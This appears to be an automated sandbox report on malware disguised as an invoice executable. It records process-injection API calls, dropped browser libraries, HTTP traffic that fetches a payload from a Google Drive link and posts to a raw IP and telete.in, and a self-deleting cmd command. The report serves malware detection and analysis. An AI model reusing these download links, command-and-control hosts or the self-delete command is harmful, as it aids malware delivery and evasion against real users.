    Source: ldif60.dll.24.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
    Source: ldif60.dll.24.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
    Source: ldif60.dll.24.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.accv.es/legislacion_c.htm0U
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.accv.es00
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.cert.fnmt.es/dpcs/0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.certicamara.com/dpc/0Z
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.chambersign.org1
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.firmaprofesional.com/cps0
    Source: mozglue.dll.24.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
    Source: ldif60.dll.24.dr | String found in binary or memory: http://www.mozilla.com0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy-G20
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.quovadis.bm0
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.quovadisglobal.com/cps0
    Source: sqlite3.dll.24.dr | String found in binary or memory: http://www.sqlite.org/copyright.html.
    Source: nssckbi.dll.24.dr | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
    Source: RYwTiizs2t.24.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
    Source: RYwTiizs2t.24.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.858194273.0000000000780000.00000004.00000001.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4wininet.dllMozilla/5
    Source: RYwTiizs2t.24.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: RYwTiizs2t.24.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: RYwTiizs2t.24.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: nssckbi.dll.24.drString found in binary or memory: https://ocsp.quovadisoffshore.com0
    Source: nssckbi.dll.24.drString found in binary or memory: https://repository.luxtrust.lu0
    Source: RYwTiizs2t.24.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
    Source: RYwTiizs2t.24.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: nssckbi.dll.24.drString found in binary or memory: https://www.catcert.net/verarrel
    Source: nssckbi.dll.24.drString found in binary or memory: https://www.catcert.net/verarrel05
    Source: ldif60.dll.24.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: RYwTiizs2t.24.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: unknown | HTTP traffic detected: POST / HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Content-Length: 128 Host: 94.158.245.117
    Source: unknown | DNS traffic detected: queries for: drive.google.com
    Source: global traffic | HTTP traffic detected: GET /uc?export=download&id=10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: drive.google.com Cache-Control: no-cache
    Source: global traffic | HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/f4m8v3r8r5cuquncp7lqv8a7pcklg93e/1631574375000/14701716994733946506/*/10smU8PgaZ7U1kQk-aksiaM6pSN2MMsz4?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-04-1s-docs.googleusercontent.com Connection: Keep-Alive
    Source: global traffic | HTTP traffic detected: GET /marinolumuop HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Content-Type: text/plain; charset=UTF-8 Host: telete.in
    Source: global traffic | HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/28e4ca709c3ae4e969310e3d8acd9cfc29159591 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 94.158.245.117
    Source: global traffic | HTTP traffic detected: GET //l/f/jYtq4XsB3dP17SpzNNud/fc0be222df12d21cfda3f20b85f1cab0e0a3d225 HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: 94.158.245.117
    Source: unknown | HTTPS traffic detected: 142.250.102.101:443 -> 192.168.2.5:49788 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 142.250.102.132:443 -> 192.168.2.5:49789 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 195.201.225.248:443 -> 192.168.2.5:49790 version: TLS 1.2

    System Summary:

    Potential malicious icon found
    Source: initial sample | Icon embedded in PE file: bad icon match: 20047c7c70f0e004
    Initial sample is a PE file and has a suspicious name
    Source: initial sample | Static PE information: Filename: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Executable has a suspicious name (potential lure to open the executable)
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Static file information: Suspicious name
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F7E91 NtWriteVirtualMemory,LdrInitializeThunk
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F6F7D NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FB3C0 NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F11C2 NtWriteVirtualMemory,TerminateProcess,LoadLibraryA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FB9D0 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5E24 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBE21 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBE33 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBA02 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F0E1E NtWriteVirtualMemory,LoadLibraryA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5A6E NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBE7C NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBA7B NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5679 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBAB9 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5EB4 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F628C NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBE8A NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5EEB NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBEE5 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5AD7 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBED7 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F630E NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBF03 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F577F NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBB56 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5F52 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FB3AA NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F6FA6 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBFB9 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5FE3 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FB3F8 NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F63CC NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBBD1 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F7023 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBC3B NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBC07 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F3416 NtWriteVirtualMemory,LoadLibraryA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5C15 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5813 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F70A6 NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBCA0 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F608A NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F6484 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FBCE6 NtMapViewOfSection
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F58CC NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022FB8C8 NtProtectVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F70DB NtAllocateVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F5CD3 NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F611D NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F594D NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Code function: 0_2_022F555C NtWriteVirtualMemory
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBDA1 NtMapViewOfSection,0_2_022FBDA1
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F61B9 NtWriteVirtualMemory,0_2_022F61B9
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9D8E NtWriteVirtualMemory,0_2_022F9D8E
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F5D86 NtWriteVirtualMemory,0_2_022F5D86
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FA5E8 NtWriteVirtualMemory,0_2_022FA5E8
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F9DE5 NtWriteVirtualMemory,0_2_022F9DE5
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F59E3 NtWriteVirtualMemory,0_2_022F59E3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022FBDF3 NtMapViewOfSection,0_2_022FBDF3
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exeCode function: 0_2_022F55CA NtWriteVirtualMemory,0_2_022F55CA
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Process Stats: CPU usage > 98%
    Source: api-ms-win-crt-private-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-conio-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-math-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-time-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-util-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-environment-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-localization-l1-2-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-string-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-rtlsupport-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-heap-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l2-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-locale-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-convert-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-file-l1-2-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-libraryloader-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-processthreads-l1-1-1.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-string-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-profile-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-utility-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-multibyte-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-heap-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-handle-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-filesystem-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-sysinfo-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-2-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-namedpipe-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-stdio-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-interlocked-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-timezone-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-synch-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-processenvironment-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-core-memory-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-process-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: api-ms-win-crt-runtime-l1-1-0.dll.24.dr | Static PE information: No import functions for PE file found
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000000.00000000.251809754.000000000041E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000000.539833282.000000000041E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862316814.000000006EA8B000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamenss3.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe, 00000018.00000002.862415894.000000006F6D2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenamemozglue.dll8 vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Binary or memory string: OriginalFilenameDoorstep2.exe vs usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
    Source: sqlite3.dll.24.dr | Static PE information: Number of sections : 18 > 10
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Virustotal: Detection: 28%
    Source: usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
    Source: unknown | Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
    Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32